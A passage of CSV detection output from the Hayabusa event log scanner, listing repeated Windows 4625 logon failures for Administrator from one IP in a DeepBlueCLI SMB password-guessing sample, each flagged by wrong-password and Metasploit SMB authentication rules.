Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k2eViuJeorX2peGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: davOE9p1fF2LbDP7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFQsEbZnm94eSuUl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnNcBIPoWdJH0x7M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Fw1xVFyar0Cal2J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWzn4Oa8PQdH9Gqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b68beIB5BKyMv8d3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HeXSJhEXzpiRX8BT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQ8Zu7ByLWddD4Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: paQzUptV8scmJvsG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQLsoIX9LPvbockz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRYbdVMbUlqFK8oM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OSO730O1fxDL4DfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wmniv339HLGKB4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rO3mxvgSES0lVN34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fvK9k9tnCq5hwBqe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujFfMT6I6L8OHag9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWKY2Wh21sePUR1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6E6yf8D5cPOEwR0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpFho8k52BkBlg4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucDvfSfDYZzjNWFS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vnq3S0gEE98xfYLv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seVfaEdAS6lEXgkG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz8BQAlyYXB61tx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkHLs6yikRWVjj9F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bQUcnUBCmE81G6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BceDCcXoHJQv9pDi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCCLt49g8wmAMEyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pM6C8KRcxVIUsZrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fw5DU6l3QRVl9cWY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37UthbuO3m4Lr7dU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: URB7Ji5pQleLtvy4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: orP9OgiBrYIKZPXE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZwvdnlIWhqoDg8On : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v6dXVbmLBpXc39ah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Mu7amiHAg0l7bza : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JdG6F697kAXFDx9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jY5AAnfQMH3VZQUa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVep4j7jZZAOAQAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KWWtGIQx8jBgAeoH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zn8X8gen8gX9i3QK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9OdUM99RBHzwgVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJbBVm6wDrqyQmpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAVRBfMxIyrfsEtR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wuCIClZihRxRyjGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxhpEP6nnmihvkHB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1HYmJDrWmKjj8DF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 